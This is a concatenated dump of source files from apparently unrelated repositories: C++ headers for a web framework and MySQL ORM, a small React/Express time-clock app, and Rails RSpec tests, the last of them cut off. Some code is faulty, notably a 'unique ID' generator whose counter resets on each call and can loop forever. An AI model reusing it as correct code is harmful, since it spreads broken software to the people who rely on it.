dml_type *tinyint_(const std::string &key);
dml_type *tinyint_(const std::string &key, const int &size);
//小整型-2^15 到 2^15-1(-32768到32767),0到65535 默认为6 大小2个字节
dml_type *smallint_(const std::string &key);
dml_type *smallint_(const std::string &key, const int &size);
//中整型-8388608到8388607,0到16777215 默认为9 大小3个字节
dml_type *mediumint_(const std::string &key);
dml_type *mediumint_(const std::string &key, const int &size);
//正常整型-2^31 到 2^31-1(-2147483648到2147483647),0到4294967295 默认为11 大小4个字节
dml_type *int_(const std::string &key);
dml_type *int_(const std::string &key, const int &size);
//长整型-2^63 到 2^63-1(-9223372036854775808到9223372036854775807),0到18446744073709551615 默认为20 大小8个字节
dml_type *bigint_(const std::string &key);
dml_type *bigint_(const std::string &key, const int &size);
//浮点型4,32bit数值范围为-3.4E38~3.4E38(7个有效位),左侧最大值占,21位,右侧最大值占4位,右侧超出4位会被截断
dml_type *float_(const std::string &key);
dml_type *float_(const std::string &key, const int &size);
//precision精度
dml_type *float_(const std::string &key, const int &size, const int &precision);
//双精度型8,64bit数值范围-1.7E308~1.7E308(15个有效位)
dml_type *double_(const std::string &key);
dml_type *double_(const std::string &key, const int &size);
dml_type *double_(const std::string &key, const int &size, const int &precision);
//数字型128bit不存在精度损失,常用于银行帐目计算(28个有效位)
dml_type *decimal_(const std::string &key);
dml_type *decimal_(const std::string &key, const int &size);
dml_type *decimal_(const std::string &key, const int &size, const int &precision);
//字符串型 256 bytes
dml_type *string_(const std::string &key);
dml_type *string_(const std::string &key, const int &size);
//文本类型 65,535 bytes
dml_type *text_(const std::string &key);
//日期时间类型YYYY-MM-DD HH:MM:SS
dml_type *date_(const std::string &key);
//创建时间+更新时间
dml_type *dateAt_();
//无符号的
dml_type *unsigned_();
//唯一的
dml_type *unique_();
//允许为null
dml_type *nullable_();
//默认值
dml_type *default_(const std::string &value);
dml_type *default_(const int &value);
//注解
dml_type *comment_(const std::string &value);
//填充0固定长度:123=0000000123
dml_type *zerofill_();
//设置索引 全文索引只支持char、varchar和text
dml_type *index_(const short &is_unique = 0);
dml_type *index_(const std::vector<std::string> &key_list, const short &is_unique = 0);
//设置非关系型数据索引
dml_type *NoSQL_();
};
}
#endif //MYSQLORM_DML_TYPE_H
<file_sep>/build/bb/include/bb/FloodIP.hpp
//
// Created by 邦邦 on 2022/6/28.
//
#ifndef BB_FLOODIP_H
#define BB_FLOODIP_H
#include "Flood.h"
struct FloodIP{
bb::Flood a10;
bb::Flood a20;
bb::Flood b10;
bb::Flood b20;
static FloodIP &obj(){
static FloodIP bb_flood_id;
return bb_flood_id;
}
private:
FloodIP():a10(3600,10),a20(3600,20),b10(1800,10),b20(1800,20){}
~FloodIP()=default;
};
#endif //BB_FLOODIP_H
<file_sep>/build/bb/include/bb/pool.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_POOL_H
#define BB_POOL_H
#include <vector>
#include <list>
#include <mutex>
#include <future>
#include <thread>
#include <functional>
#include "pool_wait.h"
namespace bb{
class pool{
struct task_list{
task_list():lock(mutex,std::defer_lock){}
std::thread thread{};
std::mutex mutex{};
std::unique_lock<std::mutex> lock;
std::condition_variable condition{};
std::list<std::function<void()>> task{};
};
unsigned short index{}; //当前下标
unsigned short work_max; //最大线程数
std::vector<task_list> f_list{}; //任务
bool state_ = true; //为假停止阻塞
explicit pool(const unsigned short &max=3);
~pool();
void run(unsigned short &i);
public:
static pool &obj(const unsigned short &max=3);
//当全部线程阻塞时,空出线程后将没有运行的项目运行
static pool_wait &objWait(const unsigned short &max=3);
void push(const std::function<void()> &f);
void close();
};
}
#endif //BB_POOL_H
<file_sep>/build/bb/include/bb/Time.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_TIME_H
#define BB_TIME_H
#include <thread>
namespace bb{
class Time{
static void test_(const int &second){
//process_time/60 //距离现在的分钟数
//process_time/3600 //距离现在的小时数60*60
//process_time/86400 //距离现在的天数60*60*24
std::this_thread::sleep_for(std::chrono::hours(second)); //小时
std::this_thread::sleep_for(std::chrono::minutes(second)); //分钟
std::this_thread::sleep_for(std::chrono::seconds(second)); //秒
std::this_thread::sleep_for(std::chrono::milliseconds(second)); //毫秒
std::this_thread::sleep_for(std::chrono::microseconds(second)); //微秒
std::this_thread::sleep_for(std::chrono::nanoseconds(second)); //纳秒
}
public:
static void sleep(const int &second);
//获取当前时间戳,自 1970-01-01 起的(秒)
static time_t getTime();
//获取当前年、月、日、时间格式
static std::string getDate(const char format[]="%Y-%m-%d %H:%M:%S",const time_t &target_time=time(nullptr));
//获取当前时间,距离目标时间
static std::string getDateAuto(const time_t &target_time=0);
};
}
#endif //BB_TIME_H
<file_sep>/build/bb/include/bb/Ran.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_RAN_H
#define BB_RAN_H
#ifdef _MSC_VER
#elif __APPLE__
#include <uuid/uuid.h>
#elif __linux__
#endif
#include <algorithm> //shuffle方法需要
#include <string>
#include <random>
#include <array>
namespace bb{
class Ran{
public:
//随机整数
static unsigned getInt(const unsigned &min={},const unsigned &max={});
//随机字符
static std::string getString(const unsigned &min_number={},const unsigned &max_number={});
//随机中文
static std::string getZh(const unsigned &min_number={},const unsigned &max_number={});
//使用uuid生成机器唯一ID
//char dst[37]{};
static char *getID(char *dst){
#ifdef _MSC_VER
/*char buffer[64] = { 0 };
GUID guid;
if(CoCreateGuid(&guid)){
fprintf(stderr, "create guid error ");
return '';
}
_snprintf(buffer, sizeof(buffer),
"%08X-%04X-%04x-%02X%02X-%02X%02X%02X%02X%02X%02X",
guid.Data1, guid.Data2, guid.Data3,
guid.Data4[0], guid.Data4[1], guid.Data4[2],
guid.Data4[3], guid.Data4[4], guid.Data4[5],
guid.Data4[6], guid.Data4[7]);
return buffer;*/
#elif __APPLE__
uuid_t uu;
uuid_generate(uu);
uuid_unparse(uu,dst);
return dst;
#elif __linux__
#endif
return nullptr;
}
//随机不重复数
static std::vector<int> getIntArr(const unsigned &max){
//创建一个数组里面存入0-max数字
std::vector<int> arr{};arr.reserve(max);for(unsigned i=0;i<max;i++){arr.push_back(i);}
//随机打乱数组
std::shuffle(arr.begin(),arr.end(),std::mt19937(std::random_device()()));
return arr;
}
//获取随机数
static unsigned long long getID1(unsigned int server_id){
//获取全局唯一ID,server_id为服务的id,当同一个服务部署在多个服务器上时,需要区别
auto getUniqueId = [](unsigned int server_id){
unsigned long long seq_id = 0;
unsigned long long seq = seq_id++ ;
seq = (seq<<8);
seq = (seq>>8);
unsigned long long tag =((unsigned long long)server_id<<56);
seq = (seq | tag);
return seq;
};
//获取全局唯一ID,且ID为奇数
unsigned long long id = getUniqueId(server_id);
while(true){
if((id & 0x01) == 0x01){
return id;
}else{
id = getUniqueId(server_id);
}
}
}
//两个数拼接
static long long append(int x, int y){
long long sum = 0;
int mid = y;
sum += x * 10;
for(;mid/=10;sum*=10);
sum += y;
return sum;
}
};
}
#endif //BB_RAN_H<file_sep>/build/bb/include/bb/tcp/IpTcp.h
// tcp/ip协议
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_IPTCP_H
#define BB_IPTCP_H
#include <arpa/inet.h> //字节转换
#include <unistd.h> //关闭文件描述符(close)
#include <netinet/in.h> //网络结构体
#include <thread>
#include <vector>
#include "bb/Log.h"
namespace bb {
class IpTcp{
public:
int socket_{}; //套接字
struct sockaddr_in addr_{}; //结构体
explicit IpTcp(const std::string &ip, const int &port,const unsigned &timeout=0);
~IpTcp();
/** 结构体设置
* ip={}为本机ip
* port=0为不绑定端口,port=1为绑定预设端口,port>1绑定指定端口
* type=4为ipV4协议类型,type=6为ipV6协议类型
* second>0设置超时时间
* addr_on=0不允许端口复用,addr_on=1允许端口复用
* */
void addrF(const std::string &ip={},const int &port=0,const int &type=4,const time_t &second=0,const int &addr_on=0);
};
}
#endif //BB_IPTCP_H
<file_sep>/build/bb/include/bb/ShareMemory.h
#ifndef BB_SHAREMEMORY_H
#define BB_SHAREMEMORY_H
#include <iostream>
#include <cstring>
#include <sys/shm.h>
namespace bb{
struct ShareMemory{
key_t shmkey{};
int shmid{};
void *shmaddr{};
size_t shmsize{1024};
void openKey(const key_t &key=IPC_PRIVATE);
void openId(const int &id);
void close();
//写
void write(void *buf,const size_t &size);
//删
void del();
//读
void *get();
};
class ShareMemoryKey:public ShareMemory{
ShareMemoryKey(const key_t &key=IPC_PRIVATE,const size_t &size=1024){
shmsize = size;
openKey(key);
}
~ShareMemoryKey(){
close();
}
public:
//key为负数
static ShareMemoryKey &obj(const key_t &key=IPC_PRIVATE,const size_t &size=1024){
static ShareMemoryKey bb_share_memory_key(key,size);
return bb_share_memory_key;
}
};
class ShareMemoryId:public ShareMemory{
ShareMemoryId(const int &id){
openId(id);
}
~ShareMemoryId(){
close();
}
public:
static ShareMemoryId &obj(const int &id){
static ShareMemoryId bb_share_memory_id(id);
return bb_share_memory_id;
}
};
}
#endif<file_sep>/build/bb/include/bb/Flood.h
// 防洪
// Created by 邦邦 on 2022/6/17.
//
#ifndef BB_FLOOD_H
#define BB_FLOOD_H
#include <string>
#include <map>
#include "bb/Time.h"
namespace bb {
class Flood {
//time/60 //距离现在的分钟数
//time/3600 //距离现在的小时数60*60
//time/86400 //距离现在的天数60*60*24
bool is_one_rm{};
bool is_two_rm{};
//保存用户的ip与访问次数,
std::map<uint32_t, unsigned> one;
std::map<uint32_t, unsigned> two;
uint32_t interval_seconds_{}; //间隔时间内
uint32_t max_number_{}; //可以触发的最大次数
public:
Flood() = default;
explicit Flood(const uint32_t &interval_seconds = 3600, const uint32_t &max_number = 60);
//将ip加入队列
void push(uint32_t &s_addr);
//获取访问次数
unsigned get(uint32_t &s_addr);
//验证ip是否超过访问次数
bool is(uint32_t &s_addr);
//将ip加进去同时验证访问次数
bool pushIs(uint32_t &s_addr);
};
}
#endif //BB_FLOOD_H
<file_sep>/build/cmake/modules/mysqlConfig.cmake
set(mysql_FOUND TRUE)
#项目名称
set(PACKAGE_FIND_NAME mysql)
#头文件路径
set(mysql_INCLUDES /usr/local/mysql/include)
#库文件路径
find_library(mysql_LIBS NAMES mysqlclient PATHS /usr/local/mysql/lib)<file_sep>/build/bb/include/bb/ssl/base64.hpp
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_BASE64_H
#define BB_BASE64_H
#include <string>
#include <cstring>
namespace bb{
namespace ssl{
class base64{
public:
static void en(const char src[],std::string &dst){
size_t src_size = strlen(src);dst={};
//定义base64编码表
char base64_table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
//经过base64编码后的字符串长度
size_t dst_size{};
if(src_size % 3 == 0){
dst_size = src_size / 3 * 4;
}else{
dst_size = (src_size / 3 + 1) * 4;
}
int i, j;
//char *dst = new char[sizeof(unsigned char) * dst_size + 1]; //内部申请的栈空间要在外部释放容易忘记
for(i = 0, j = 0; i < dst_size - 2; j += 3, i += 4){ //以3个8位字符为一组进行编码
dst += base64_table[src[j] >> 2]; //取出第一个字符的前6位并找出对应的结果字符
dst += base64_table[(src[j] & 0x3) << 4 | (src[j + 1] >> 4)]; //将第一个字符的后位与第二个字符的前4位进行组合并找到对应的结果字符
dst += base64_table[(src[j + 1] & 0xf) << 2 | (src[j + 2] >> 6)]; //将第二个字符的后4位与第三个字符的前2位组合并找出对应的结果字符
dst += base64_table[src[j + 2] & 0x3f]; //取出第三个字符的后6位并找出结果字符
}
//处理最后一组数据
switch(src_size % 3){
case 1:
dst[i - 2] = '=';
dst[i - 1] = '=';
break;
case 2:
dst[i - 1] = '=';
break;
}
}
static void de(const char code[],std::string &dst){
//根据base64表,以字符找到对应的十进制数据
char decode64_table[] = {
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
62, // '+'
0, 0, 0,
63, // '/'
52, 53, 54, 55, 56, 57, 58, 59, 60, 61, // '0'-'9'
0, 0, 0, 0, 0, 0, 0,
0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12,
13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, // 'A'-'Z'
0, 0, 0, 0, 0, 0,
26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38,
39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, // 'a'-'z'
};
size_t len = strlen(code);
for(int i = 0; i < len - 2; i += 4){ //以4个字符为一位进行解码
dst += (decode64_table[code[i]]) << 2 | ((decode64_table[code[i + 1]]) >> 4); //取出第一个字符对应base64表的十进制数的前6位与第二个字符对应base64表的十进制数的后2位进行组合
if(code[i + 1] == '=' || code[i + 2] == '='){break;}
dst += ((decode64_table[code[i + 1]]) << 4) | ((decode64_table[code[i + 2]]) >> 2); //取出第二个字符对应base64表的十进制数的后4位与第三个字符对应bas464表的十进制数的后4位进行组合
if(code[i + 2] == '=' || code[i + 3] == '='){break;}
dst += ((decode64_table[code[i + 2]]) << 6) | (decode64_table[code[i + 3]]); //取出第三个字符对应base64表的十进制数的后2位与第4个字符进行组合
}
}
};
}
}
#endif //BB_BASE64_H
<file_sep>/build/mysql_orm/include/mysql_orm/sql/dql.h
// 查询
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DQL_H
#define MYSQLORM_DQL_H
#include "dml.h"
namespace bb {
//分页的结构体
struct PageData {
unsigned limit{}; //需要的长度
unsigned long total_size{}; //总大小
unsigned long total_page{}; //总页
};
class dql : public dml {
unsigned index_{}; //负载均衡下标(不会被其它用户的构造影响)
std::string where_key_ = "*";
std::array<std::string, 2> where_sql_ = {"", ""};
public:
PageData page_data_; //翻页信息
std::vector<std::map<std::string, std::string>> data_; //查询到的数据
explicit dql();
public:
//model获取类的名称
virtual std::array<std::string, 2> getName_();
//获取指定的key
dql *select(const std::string &key = "*");
dql *selectArr(const std::vector<std::string> &key);
//以id获取
dql *find(const unsigned long &id = 1);
//where
dql *where(const std::string &key, const std::string &value);
dql *where(const std::string &key, const double &value);
dql *where(const std::string &key, const std::string &symbols, const std::string &value);
dql *where(const std::string &key, const std::string &symbols, const double &value);
//主要用于值为null的正确获取
dql *notWhere(const std::string &key, const std::string &value);
dql *notWhere(const std::string &key, const unsigned long &value);
dql *notWhere(const std::string &key, const std::string &symbols, const std::string &value);
dql *notWhere(const std::string &key, const std::string &symbols, const unsigned long &value);
dql *orWhere(const std::string &key, const std::string &value);
dql *orWhere(const std::string &key, const unsigned long &value);
dql *orWhere(const std::string &key, const std::string &symbols, const std::string &value);
dql *orWhere(const std::string &key, const std::string &symbols, const unsigned long &value);
//排序方式升序ASC,降序DESC
dql *order(const std::string &key, const std::string &type = "ASC");
//查询key=start_value到end_value之间的数据,包含边界值
dql *between(const std::string &key, const unsigned long &start_value, const unsigned long &end_value);
//获取值为null的所有数据
dql *isNull(const std::string &key);
//获取值不为null的所有数据
dql *isNotNull(const std::string &key);
//like查找 %(匹配任意多个字符) _(匹配单一字符) \(转义)
dql *like(const std::string &key, const std::string &value);
public:
//分页
dql *paginate(const unsigned &length = 100, const std::string &order_a = "ASC");
//翻页
std::vector<std::map<std::string, std::string>> pageTurning(const unsigned &page = 1);
//查询数据
dql *get_(const std::string &sql);
//显示全部
int show_();
//获取数据
std::vector<std::map<std::string, std::string>> &get();
//查看获取到的数据
int show();
//查看索引
int showIndex();
//用于查看执行了多少次
int explain();
//判断数据库是否存在
int isDB(const std::string &name);
//判断数据表是否存在
int isTable(const std::string &name);
};
}
#endif //MYSQLORM_DQL_H
<file_sep>/build/mysql_orm/cmake/mysql_ormTargets-release.cmake
#----------------------------------------------------------------
# Generated CMake target import file for configuration "Release".
#----------------------------------------------------------------
# Commands may need to know the format version.
set(CMAKE_IMPORT_FILE_VERSION 1)
# Import target "mysql_orm" for configuration "Release"
set_property(TARGET mysql_orm APPEND PROPERTY IMPORTED_CONFIGURATIONS RELEASE)
set_target_properties(mysql_orm PROPERTIES
IMPORTED_LINK_INTERFACE_LANGUAGES_RELEASE "CXX"
IMPORTED_LOCATION_RELEASE "${_IMPORT_PREFIX}/lib/libmysql_orm.a"
)
list(APPEND _IMPORT_CHECK_TARGETS mysql_orm )
list(APPEND _IMPORT_CHECK_FILES_FOR_mysql_orm "${_IMPORT_PREFIX}/lib/libmysql_orm.a" )
# Commands beyond this point should not need to know the version.
set(CMAKE_IMPORT_FILE_VERSION)
<file_sep>/build/bb/include/bb/file.h
//
// Created by 邦邦 on 2022/7/8.
//
#ifndef BB_FILE_H
#define BB_FILE_H
#include <string>
#include <vector>
#include <sys/stat.h> //S_IRWXU
#include <unistd.h> //关闭文件描述符(close)
namespace bb{
class file{
public:
static size_t mkdir_pF(std::string &dir){
std::vector<std::string> dir_list{};
std::string str;
for(auto &v:dir){
if(v == '.'){}else if(v == '/'){
if(!str.empty()){
dir_list.push_back(str);
str += '/';
}
}else{
str+=v;
}
}
if(!str.empty()){
dir_list.push_back(str);
}
for(auto &v:dir_list){
if(access(("./"+v).c_str(),F_OK) == -1){
mkdir(("./"+v).c_str(),S_IRWXU);
}
}
return dir_list.size();
}
};
}
#endif //BB_FILE_H
<file_sep>/build/bb/include/bb/http/Analyze.h
// 分析http头信息
// Created by 邦邦 on 2022/6/17.
#ifndef BB_ANALYZE_H
#define BB_ANALYZE_H
#include <cstring>
#include <string>
#include <map>
#include <utility>
#include "bb/Log.h"
namespace bb{
namespace http{
class Analyze{
int8_t n_type_{}; //换行符类型
//构造时调用,解析第一行数据得到method、path、treaty,然后调用setGetMap_得到get传参的数据
void firstF_();
public:
char *r_buf; //接收到的原始数据
ssize_t r_size{}; //接收到的数据大小
ssize_t start_index; //数据内容在字符串中的开始位置,数据如果是数组用body_arr_index标记下标
std::string method,path,treaty; //GET,/a1_get?aaa=123&bbb=bbb,HTTP/1.1
std::map<std::string, std::string> head_map; //头信息
std::map<std::string, std::string> get_map; //get传递的数据
//对数据进行分割
explicit Analyze(char *r_buf,ssize_t &r_size);
//外部调用得到传递的数据
bool getPost(std::map<std::string, std::string> &r_data);
bool getPost(std::map<std::string, std::string> &r_data,char *r_buf_1,ssize_t &start_index_1);
};
}
}
#endif<file_sep>/build/bb/cmake/bbTargets-release.cmake
#----------------------------------------------------------------
# Generated CMake target import file for configuration "Release".
#----------------------------------------------------------------
# Commands may need to know the format version.
set(CMAKE_IMPORT_FILE_VERSION 1)
# Import target "bb" for configuration "Release"
set_property(TARGET bb APPEND PROPERTY IMPORTED_CONFIGURATIONS RELEASE)
set_target_properties(bb PROPERTIES
IMPORTED_LINK_INTERFACE_LANGUAGES_RELEASE "CXX"
IMPORTED_LOCATION_RELEASE "${_IMPORT_PREFIX}/lib/libbb.a"
)
list(APPEND _IMPORT_CHECK_TARGETS bb )
list(APPEND _IMPORT_CHECK_FILES_FOR_bb "${_IMPORT_PREFIX}/lib/libbb.a" )
# Commands beyond this point should not need to know the version.
set(CMAKE_IMPORT_FILE_VERSION)
<file_sep>/build/bb/include/bb/http/Config.hpp
//http配置
#ifndef BB_CONFIG_H
#define BB_CONFIG_H
#include <map>
#include <string>
#include "bb/file.h"
namespace bb{
namespace http{
//在内存里面存储html
struct ST_html{
size_t size{}; //每次的大小
char *buf{};
};
struct ST_html_arr{
size_t size{}; //总大小
std::vector<ST_html> body{};
};
class Config{
Config(){
bb::file::mkdir_pF(web_dir);
bb::file::mkdir_pF(file_dir);
};
~Config(){
if(serve_cache){
for(auto &v:cache_html){
for(auto &vv:v.second.body){
delete []vv.buf;
}
}
}
};
public:
bool gzip=false; //gzip支持
bool serve_cache=true; //服务端缓存html
bool client_cache=true; //客户端缓存html
std::string web_dir = "/html"; //网站目录
std::string file_dir = "/file"; //文件目录
static const unsigned short SEND_MAX{1472}; //每次最大发送字节
static const unsigned short RECF_MAX{1500}; //每次最大接收的字节
std::map<std::string,ST_html_arr> cache_html{}; //在内存里面存储html
//文件对应的类型(Content-Type)
std::map<std::string,std::string> content_type_{
{"html","text/html;charset=utf8"},
{"htm","text/html;charset=utf8"},
{"jsp","text/html;charset=utf8"},
{"txt","text/plain;charset=utf8"},
{"css","text/css;charset=utf8"},
{"ico","application/x-icon"},
{"js","application/javascript;charset=utf8"},
{"map","application/javascript;charset=utf8"}, //vue的js debug文件
{"xml","application/xml;charset=utf8"},
{"json","application/json;charset=utf8"},
{"jpg","image/jpeg"},
{"jpe","image/jpeg"},
{"jpeg","image/jpeg"},
{"gif","image/gif"},
{"png","image/png"},
{"mp3","audio/mp3"},
{"mp4","video/mpeg4"},
{"mpeg","video/mpg"},
{"default","text/html;charset=utf8"}
};
//要响应的http头
void head(std::string &s_head,const std::string &method,const std::string &state,const std::string &type,const size_t &size={},const bool &is_gzip=false,const bool &is_cache=false){
s_head = "HTTP/1.1 "+state+"\r\n"
"Content-Type: "+content_type_[type]+"\r\n"
"Access-Control-Allow-Method: "+method+"\r\n" //GET,POST,OPTIONS,PUT,DELETE,PATCH,HEAD(发PUT请求前会先发OPTIONS请求进行预检)
"Access-Control-Allow-Headers: x-requested-with,content-type\r\n" //x-requested-with,content-type包含Access-Control-Request-Headers附带的内容//info->head_data["Access-Control-Request-Headers"]
"Server: BB/4.0\r\n"; //服务器类型
//如果使用epoll必须指定文件长度,否则会一直等待,超时才会断开链接,浏览器才会请求下一个文件
if(size){s_head+="Content-Length: "+std::to_string(size)+"\r\n";}
if(is_gzip){s_head+="Content-Encoding:gzip\r\n";}
if(is_cache){s_head+="Cache-Control:max-age=28800\r\n";}
/*if(!info->head_data["Origin"].empty()){
"Access-Control-Allow-Origin: "+info->head_data["Origin"]+"\r\n" //等于*或Origin附带的内容(cors,如果请求中附带有Origin表示有跨域验证)
"Access-Control-Allow-Credentials: true\r\n"; //允许客户端携带验证信息(例如 cookie 之类的,Access-Control-Allow-Origin: *时不能为true)
}*/
s_head += "\r\n";
}
public:
static Config &obj(){
static Config bb_http_config;
return bb_http_config;
}
};
}
}
#endif<file_sep>/build/mysql_orm/include/mysql_orm/sql/dml.h
// 操纵
// Created by 邦邦 on 2022/4/18.
//
#ifndef MYSQLORM_DML_H
#define MYSQLORM_DML_H
#include "ddl.h"
#include "dml_type.h"
namespace bb {
class dml : public dml_type {
std::array<std::string, 2> where_sql_ = {"", ""};
protected:
std::string DB_name_; //库名称
std::string table_name_; //表名称
public:
//向mysql发送数据
int query_(const std::string &sql);
protected:
//切换并创建库,连接库不存在时创建并连接(库名最多64个字符)
int useDB(const std::string &name);
//创建库,库名最多64-10个字符
int createDB(const std::string &name);
//改库名称
int upDB(const std::string &old_name, const std::string &new_name);
//删除库
int delDB(const std::string &name);
//切换表
int useTable(const std::string &name);
//创建表,表名最大64-10个字符,crud.createTable([](auto *data){data->int_("a12")->nullable_()->comment_("这是a1");})
int createTable(const std::string &name, void (*createF)(dml *));
//改表名称
int upTable(const std::string &name);
//删除表
int delTable();
//追加列
int addCol(void (*createF)(dml *));
//改列名称(key)与类型
int upColName(const std::string &old_key, void (*createF)(dml *));
//改列类型(key)
int upColType(void (*createF)(dml *));
//删除列(key)
int delCol(const std::string &key);
//删除多个列(key)
int delCols(const std::vector<std::string> &key_arr);
//创建索引,如果是全文索引它只支持 char、varchar和text
int addIndex_(const std::vector<std::string> &key_list, const short &type = 0);
int addIndex(const std::string &key, const short &type = 0);
//删除索引
int delIndex(const std::string &key);
public:
//清空表
int truncate();
//插入数据{{"键1","值1"},{"k2","v2"}}
int insert(const std::map<std::string, std::string> &data);
int insert(const std::map<std::string, double> &data);
//批量插入数据{"键1","键2"},{{"v1","v2"},{"k11","v22"}}
int insert(const std::vector<std::string> &key, const std::vector<std::vector<std::string>> &value);
int insert(const std::vector<std::string> &key, const std::vector<std::vector<double>> &value);
//改一行(符合条件的一行数据)
int update(const std::vector<std::array<std::string, 2>> &data);
//删除行(符合条件的行,where需通过DQL构建)
int del();
};
}
#endif //MYSQLORM_DML_H
<file_sep>/build/bb/include/bb/Token.h
//
// Created by 邦邦 on 2022/6/26.
//
#ifndef BB_TOKEN_H
#define BB_TOKEN_H
#include <set>
#include <string>
#include "Ran.h"
#include "Time.h"
#include "ssl/md5.hpp"
#include "ssl/base64.hpp"
#include "Log.h"
namespace bb{
class Token{
unsigned max_size_ = 10;
std::string token_db_path_ = "./token.db";
std::set<std::string> token_{};
Token();
~Token();
public:
static Token &obj();
void push(const char *accounts,std::string &token);
void dec(std::string &en_token,std::string &token);
bool is(std::string &token) const;
bool rm(std::string &token);
};
}
#endif //BB_TOKEN_H<file_sep>/build/bb/include/bb/Log.h
//
// Created by 邦邦 on 2022/4/22.
//
#ifndef BB_LOG_H
#define BB_LOG_H
#include <string>
#include <mutex>
#include <exception>
#include "Time.h"
namespace bb {
//__FILE__,__LINE__,__func__
class Log{
const char *log_path_ = "./bb.log"; //日志保存位置
std::string msg_arr_; //消息内容
Log()=default;
~Log();
public:
static Log &obj();
public:
//一般信息
void info(std::string msg);
void info(std::string msg,const std::string &file_path);
void info(std::string msg,const std::string &file_path,const int &line);
//警告信息
void warn(std::string msg);
void warn(std::string msg,const std::string &file_path);
void warn(std::string msg,const std::string &file_path,const int &line);
//错误信息
void error(std::string msg);
void error(std::string msg,const std::string &file_path);
void error(std::string msg,const std::string &file_path,const int &line);
};
}
#endif //BB_LOG_H
<file_sep>/Config.cmake.in
@PACKAGE_INIT@
#用于检查路径是否合法
set_and_check(@PROJECT_NAME@_INCLUDES "@PACKAGE_INCLUDES@")
set_and_check(@PROJECT_NAME@_LIBS "@PACKAGE_LIBS@")
set_and_check(@PROJECT_NAME@_CMAKE "@PACKAGE_CMAKE@")
#引入安装生成信息
include("@PACKAGE_CMAKE@/@[email protected]")
#用于检查依赖项是否存在
check_required_components(@PROJECT_NAME@)<file_sep>/CMakeLists.txt
cmake_minimum_required(VERSION 3.16)
set(CMAKE_CXX_STANDARD 20)
project(test VERSION 3.0.1)
set(CMAKE_BUILD_TYPE Release)
set(LIBRARY_OUTPUT_PATH ${CMAKE_BINARY_DIR}/lib)
set(EXECUTABLE_OUTPUT_PATH ${CMAKE_BINARY_DIR})
set(CMAKE_PREFIX_PATH ${CMAKE_SOURCE_DIR}/build/cmake/modules)
find_package(bb 4.0 REQUIRED NO_MODULE)
find_package(mysql REQUIRED NO_MODULE)
find_package(mysql_orm REQUIRED NO_MODULE)
include_directories(${bb_INCLUDES} ${mysql_INCLUDES} ${mysql_orm_INCLUDES} include)
add_executable(${PROJECT_NAME}_run main.cpp)
target_link_libraries(${PROJECT_NAME}_run -lpthread bb mysql_orm ${mysql_LIBS})
|
1007b036f233c21d542d9fee11adeb7b66cd833d
|
[
"Markdown",
"CMake",
"C++"
] | 28 |
Markdown
|
135356/BBMySQL
|
e70cc6011e85040fffe36d3f6a415b048b6fa05b
|
20b9a59c90daa466967b433ba07bfcf609bbeed8
|
refs/heads/main
|
<repo_name>itamar-mizrahi/wittix<file_sep>/client/src/App.js
import React from "react";
import Login from "./components/Login";
import "./components/main.scss";
export const Context = React.createContext();
const App = () => {
return (
<div className="App">
<Login />
</div>
);
};
export default App;
<file_sep>/server.js
const express = require("express");
const app = express();
var http = require("http").Server(app);
const path = require("path");
const bodyparser = require("body-parser");
app.use(bodyparser.urlencoded({ extended: false }));
app.use(bodyparser.json());
const start = require("./routes/api/start");
app.use("/api/start", start);
const end = require("./routes/api/end");
app.use("/api/end", end);
if (process.env.NODE_ENV === "production") {
app.use(express.static("client/build"));
app.get("*", (req, res) => {
res.sendFile(path.resolve(__dirname, "client", "build", "index.html"));
});
}
const PORT = process.env.PORT || 5000;
var server = http.listen(PORT, () => {
console.log("server is running on port", server.address().port);
});<file_sep>/client/src/components/Login.js
import React, { Component } from "react";
import axios from "axios";
class Login extends Component {
constructor(props) {
super(props);
this.state = {
rnageStart: 1,
rangeEnd: 1
};
}
startWorke = () => {
axios.post("/api/start/startWork", {
range: this.state.rnageStart
}).then((res) => {
if (res.status === 200) {
}
})
};
endWork = () => {
axios.post("/api/end/endWork", {
range: this.state.rnageStart
}).then((res) => {
if (res.status === 200) {
}
})
};
render() {
return (
<div className="col-md-6 offset-md-3 col-sm-12">
<h1 style={{ marginTop: "15px" }} className="text-center">
Welcome to Work Hours
</h1>
<button style={{ margin: "20px" }} onClick={this.startWorke}>
Start work
</button>
<button style={{ margin: "20px" }} onClick={this.endWork}>
End work
</button>
</div>
);
}
}
export default Login;
|
04c55bb4d8f52d086643d857428449d7f194673e
|
[
"JavaScript"
] | 3 |
JavaScript
|
itamar-mizrahi/wittix
|
513d8adc6f29fe873860651cb6ad0758743c9eef
|
ec01a014df02dfdef50c4b8c7ef287beb18c15a7
|
refs/heads/master
|
<file_sep>class Author < ActiveRecord::Base
validates_presence_of :name
validates_presence_of :email
validates_presence_of :zip_code
end
<file_sep>class Comments < ActiveRecord::Base
validates_presence_of :user
validates_presence_of :text
end
<file_sep>require 'spec_helper'
describe Author do
it {should have_valid(:name).when('<NAME>', '<NAME>', '<NAME>')}
it {should_not have_valid(:name).when(nil, '') }
it {should have_valid(:email).when('<EMAIL>', '<EMAIL>')}
it {should_not have_valid(:name).when(nil, '')}
it {should have_valid(:zip_code).when(17601, 03037, 19147)}
it {should_not have_valid(:zip_code).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe Comments do
it {should have_valid(:user).when('<NAME>', '<NAME>')}
it {should_not have_valid(:user).when(nil, '')}
it {should have_valid(:text).when('your mac tips rule', 'ole')}
it {should_not have_valid(:text).when(nil, '')}
end
<file_sep>require 'spec_helper'
describe BlogPosts do
it {should have_valid(:title).when('Mac Tips and Tricks', 'Magarita Tips and Tricks')}
it {should_not have_valid(:title).when(nil, '') }
